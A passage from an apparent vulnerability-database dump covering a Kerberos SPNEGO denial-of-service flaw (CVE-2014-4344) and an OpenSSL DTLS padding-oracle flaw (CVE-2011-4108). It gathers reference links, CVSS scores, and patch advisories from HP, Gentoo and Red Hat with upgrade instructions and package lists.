"http://krbdev.mit.edu/rt/ticket/display.html?id=7970" }, { "trust": 1.6, "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136360.html" }, { "trust": 1.6, "url": "http://secunia.com/advisories/59102" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60082" }, { "trust": 1.6, "url": "http://secunia.com/advisories/60448" }, { "trust": 1.6, "url": "http://secunia.com/advisories/61051" }, { "trust": 1.6, "url": "http://support.f5.com/kb/en-us/solutions/public/15000/500/sol15561.html" }, { "trust": 1.6, "url": "http://www.debian.org/security/2014/dsa-3000" }, { "trust": 1.6, "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2014:165" }, { "trust": 1.6, "url": "http://www.osvdb.org/109389" }, { "trust": 1.6, "url": "http://www.securityfocus.com/bid/69160" }, { "trust": 1.6, "url": "http://www.securitytracker.com/id/1030706" }, { "trust": 1.6, "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1121877" }, { "trust": 1.6, "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/95210" }, { "trust": 1.6, "url": "https://github.com/krb5/krb5/commit/524688ce87a15fc75f87efc8c039ba4c7d5c197b" }, { "trust": 1.6, "url": "https://github.com/krb5/krb5/commit/a7886f0ed1277c69142b14a2c6629175a6331edc" }, { "trust": 0.9, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4344" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4344" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4341" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4344" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2022060309" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4345" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4342" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4343" }, { "trust": 0.3, "url": "http://web.mit.edu/kerberos/www/" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1418" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-6800" }, { "trust": 0.3, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.3, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.3, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.3, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.3, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "http://www.debian.org/security/" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-6800.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2013-1418.html" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/#package" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-4341.html" }, { "trust": 0.2, "url": "https://www.redhat.com/security/data/cve/cve-2014-4344.html" }, { "trust": 0.1, "url": "http://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.8.1+dfsg-2ubuntu0.13" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.12+dfsg-2ubuntu4.2" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1416" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/krb5/1.10+dfsg~beta1-2ubuntu0.5" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2012-1016" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1415" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-2310-1" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4345" }, { "trust": 0.1, "url": "http://www.mandriva.com/en/support/security/advisories/" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4341" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4342" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1245.html" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4342" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4343" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9423" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4341" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5353" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9422" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9421" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4345" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9423" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-5352" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-9422" }, { "trust": 0.1, "url": "https://access.redhat.com/security/cve/cve-2014-4344" }, { "trust": 0.1, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4345.html" }, { "trust": 0.1, "url": "https://rhn.redhat.com/errata/rhsa-2014-1389.html" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4343.html" }, { "trust": 0.1, "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.6_technical_notes/krb5.html#rhsa-2014-1389" }, { "trust": 0.1, "url": "https://www.redhat.com/security/data/cve/cve-2014-4342.html" } ], "sources": [ { "db": "BID", "id": "69160" }, { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "69160" }, { "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "db": "PACKETSTORM", "id": "127813" }, { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "NVD", "id": "CVE-2014-4344" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-07-22T00:00:00", "db": "BID", "id": "69160" }, { "date": "2014-08-15T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "date": "2014-08-11T13:33:00", "db": "PACKETSTORM", "id": "127813" }, { "date": "2014-08-11T18:24:00", "db": "PACKETSTORM", "id": "127825" }, { "date": "2014-09-02T20:17:38", "db": "PACKETSTORM", "id": "128077" }, { "date": "2014-09-16T14:08:26", "db": "PACKETSTORM", "id": "128267" }, { "date": "2015-03-05T21:51:51", "db": "PACKETSTORM", "id": "130669" }, { "date": "2014-10-14T23:04:48", "db": "PACKETSTORM", "id": "128660" }, { "date": "2014-08-14T05:01:49.943000", "db": "NVD", "id": "CVE-2014-4344" }, { "date": "2014-08-15T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-05-07T17:10:00", "db": "BID", "id": "69160" }, { "date": "2015-06-08T00:00:00", "db": "JVNDB", "id": "JVNDB-2014-003819" }, { "date": "2020-01-21T15:46:47.197000", "db": "NVD", "id": "CVE-2014-4344" }, { "date": "2022-06-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201408-252" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "127825" }, { "db": "PACKETSTORM", "id": "128077" }, { "db": "PACKETSTORM", "id": "128267" }, { "db": "PACKETSTORM", "id": "130669" }, { "db": "PACKETSTORM", "id": "128660" }, { "db": "CNNVD", "id": "CNNVD-201408-252" } ], "trust": 1.1 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "MIT Kerberos 5 of lib/gssapi/spnego/spnego_mech.c of SPNEGO Asceptor\u0027s acc_ctx_cont Service disruption in functions (DoS) Vulnerabilities", "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003819" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "code problem", "sources": [ { "db": "CNNVD", "id": "CNNVD-201408-252" } ], "trust": 0.6 } }
var-201201-0169
Vulnerability from variot
The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Fiery Network Controllers for Xerox DocuColor 242/252/260 Printer/Copier use a vulnerable version of OpenSSL (0.9.8o). OpenSSL prone to multiple security vulnerabilities. An attacker may leverage these issues to obtain sensitive information, cause a denial-of-service condition and perform unauthorized actions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03360041
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03360041 Version: 1
HPSBMU02786 SSRT100877 rev.1 - HP System Management Homepage (SMH) Running on Linux and Windows, Remote Unauthorized Access, Disclosure of Information, Data Modification, Denial of Service (DoS), Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2012-06-26 Last Updated: 2012-06-26
Potential Security Impact: Remote unauthorized access, disclosure of information, data modification, Denial of Service (DoS), execution of arbitrary code
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in unauthorized access, disclosure of information, data modification, Denial of Service (DoS), and execution of arbitrary code.
References: CVE-2011-1944, CVE-2011-2821, CVE-2011-2834, CVE-2011-3379, CVE-2011-3607, CVE-2011-4078, CVE-2011-4108, CVE-2011-4153, CVE-2011-4317, CVE-2011-4415, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, CVE-2011-4885, CVE-2012-0021, CVE-2012-0027, CVE-2012-0031, CVE-2012-0036, CVE-2012-0053, CVE-2012-0057, CVE-2012-0830, CVE-2012-1165, CVE-2012-1823, CVE-2012-2012 (AUTOCOMPLETE enabled), CVE-2012-2013 (DoS), CVE-2012-2014 (Improper input validation), CVE-2012-2015 (Privilege Elevation), CVE-2012-2016 (Information disclosure), SSRT100336, SSRT100753, SSRT100669, SSRT100676, SSRT100695, SSRT100714, SSRT100760, SSRT100786, SSRT100787, SSRT100815, SSRT100840, SSRT100843, SSRT100869
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) before v7.1.1 running on Linux and Windows.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2012-2012 (AV:N/AC:L/Au:N/C:C/I:C/A:P) 9.7 CVE-2012-2013 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2012-2014 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 6.8 CVE-2012-2015 (AV:N/AC:M/Au:S/C:P/I:N/A:N) 6.5 CVE-2012-2016 (AV:L/AC:M/Au:S/C:C/I:N/A:N) 4.4 CVE-2011-1944 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 CVE-2011-2821 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-2834 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2011-3379 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-3607 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4 CVE-2011-4078 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4108 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2011-4153 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4317 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2011-4415 (AV:L/AC:H/Au:N/C:N/I:N/A:P) 1.2 CVE-2011-4576 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2011-4577 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2011-4619 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-4885 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0021 (AV:N/AC:H/Au:N/C:N/I:N/A:P) 2.6 CVE-2012-0027 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-0031 (AV:L/AC:L/Au:N/C:P/I:P/A:P) 4.6 CVE-2012-0036 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-0053 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0057 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-0830 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-1165 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-1823 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided HP System Management Homepage v7.1.1 or subsequent to resolve the vulnerabilities. HP System Management Homepage v7.1.1 is available here:
HP System Management Homepage for Windows x64
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4064%257CswLang%253D8%257CswItem%253DMTX-ab 0d4e9bb4654a8da503eccfd9%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Windows x86
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4022%257CswLang%253D8%257CswItem%253DMTX-f7 c0d15d28474255bd0ec23136%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (AMD64/EM64T)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4035%257CswLang%253D8%257CswItem%253DMTX-18 d373dd1361400fbaca892942%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HP System Management Homepage for Linux (x86)
[Download here] or enter the following URL into the browser address window.
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetail s/?sp4ts.oid=4091409&spf_p.tpst=psiSwdMain&spf_p.prp_psiSwdMain=wsrp-navigati onalState%3Dlang%253Den%257Ccc%253DUS%257CprodSeriesId%253D4091408%257CprodNa meId%253D4091409%257CswEnvOID%253D4006%257CswLang%253D8%257CswItem%253DMTX-9e 8a0188f97d48139dcb466509%257Cmode%253D3%257Caction%253DdriverDocument&javax.p ortlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vign ette.cachetoken
HISTORY Version:1 (rev.1) 26 June 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201203-12
http://security.gentoo.org/
Severity: Normal Title: OpenSSL: Multiple vulnerabilities Date: March 06, 2012 Bugs: #397695, #399365 ID: 201203-12
Synopsis
Multiple vulnerabilities have been found in OpenSSL, allowing remote attackers to cause a Denial of Service or obtain sensitive information.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.0g *>= 0.9.8t >= 1.0.0g
Description
Multiple vulnerabilities have been found in OpenSSL:
- Timing differences for decryption are exposed by CBC mode encryption in OpenSSL's implementation of DTLS (CVE-2011-4108).
- An incorrect fix for CVE-2011-4108 creates an unspecified vulnerability for DTLS applications using OpenSSL (CVE-2012-0050).
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.0g"
References
[ 1 ] CVE-2011-4108 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4108 [ 2 ] CVE-2011-4109 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4109 [ 3 ] CVE-2011-4576 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4576 [ 4 ] CVE-2011-4577 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4577 [ 5 ] CVE-2011-4619 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4619 [ 6 ] CVE-2012-0027 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0027 [ 7 ] CVE-2012-0050 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0050
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201203-12.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 .
Multiple numeric conversion errors, leading to a buffer overflow, were found in the way OpenSSL parsed ASN.1 (Abstract Syntax Notation One) data from BIO (OpenSSL's I/O abstraction) inputs. Specially-crafted DER (Distinguished Encoding Rules) encoded data read from a file or other BIO input could cause an application using the OpenSSL library to crash or, potentially, execute arbitrary code.
Warning: Before applying the update, back up your existing JBoss Enterprise Web Server installation (including all applications and configuration files).
All users of JBoss Enterprise Web Server 1.0.2 for Solaris and Microsoft Windows as provided from the Red Hat Customer Portal are advised to apply this update. Solution:
The References section of this erratum contains a download link (you must log in to download the update). Before applying the update, back up your existing JBoss Enterprise Web Server installation (including all applications and configuration files). -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: openssl security update Advisory ID: RHSA-2012:0059-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2012-0059.html Issue date: 2012-01-24 CVE Names: CVE-2011-4108 CVE-2011-4576 CVE-2011-4577 CVE-2011-4619 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
It was discovered that the Datagram Transport Layer Security (DTLS) protocol implementation in OpenSSL leaked timing information when performing certain operations. A remote attacker could possibly use this flaw to retrieve plain text from the encrypted packets by using a DTLS server as a padding oracle. (CVE-2011-4108)
An information leak flaw was found in the SSL 3.0 protocol implementation in OpenSSL. Incorrect initialization of SSL record padding bytes could cause an SSL client or server to send a limited amount of possibly sensitive data to its SSL peer via the encrypted connection. (CVE-2011-4576)
A denial of service flaw was found in the RFC 3779 implementation in OpenSSL. A remote attacker could use this flaw to make an application using OpenSSL exit unexpectedly by providing a specially-crafted X.509 certificate that has malformed RFC 3779 extension data. (CVE-2011-4577)
It was discovered that OpenSSL did not limit the number of TLS/SSL handshake restarts required to support Server Gated Cryptography. A remote attacker could use this flaw to make a TLS/SSL server using OpenSSL consume an excessive amount of CPU by continuously restarting the handshake. (CVE-2011-4619)
All OpenSSL users should upgrade to these updated packages, which contain backported patches to resolve these issues. For the update to take effect, all services linked to the OpenSSL library must be restarted, or the system rebooted.
- Solution:
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259
- Bugs fixed (http://bugzilla.redhat.com/):
771770 - CVE-2011-4108 openssl: DTLS plaintext recovery attack 771775 - CVE-2011-4576 openssl: uninitialized SSL 3.0 padding 771778 - CVE-2011-4577 openssl: malformed RFC 3779 data can cause assertion failures 771780 - CVE-2011-4619 openssl: SGC restart DoS attack
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-1.0.0-20.el6_2.1.ppc.rpm openssl-1.0.0-20.el6_2.1.ppc64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc.rpm openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-devel-1.0.0-20.el6_2.1.ppc.rpm openssl-devel-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-1.0.0-20.el6_2.1.s390.rpm openssl-1.0.0-20.el6_2.1.s390x.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390.rpm openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-devel-1.0.0-20.el6_2.1.s390.rpm openssl-devel-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-1.0.0-20.el6_2.1.i686.rpm openssl-1.0.0-20.el6_2.1.x86_64.rpm openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-devel-1.0.0-20.el6_2.1.i686.rpm openssl-devel-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/openssl-1.0.0-20.el6_2.1.src.rpm
i386: openssl-debuginfo-1.0.0-20.el6_2.1.i686.rpm openssl-perl-1.0.0-20.el6_2.1.i686.rpm openssl-static-1.0.0-20.el6_2.1.i686.rpm
ppc64: openssl-debuginfo-1.0.0-20.el6_2.1.ppc64.rpm openssl-perl-1.0.0-20.el6_2.1.ppc64.rpm openssl-static-1.0.0-20.el6_2.1.ppc64.rpm
s390x: openssl-debuginfo-1.0.0-20.el6_2.1.s390x.rpm openssl-perl-1.0.0-20.el6_2.1.s390x.rpm openssl-static-1.0.0-20.el6_2.1.s390x.rpm
x86_64: openssl-debuginfo-1.0.0-20.el6_2.1.x86_64.rpm openssl-perl-1.0.0-20.el6_2.1.x86_64.rpm openssl-static-1.0.0-20.el6_2.1.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
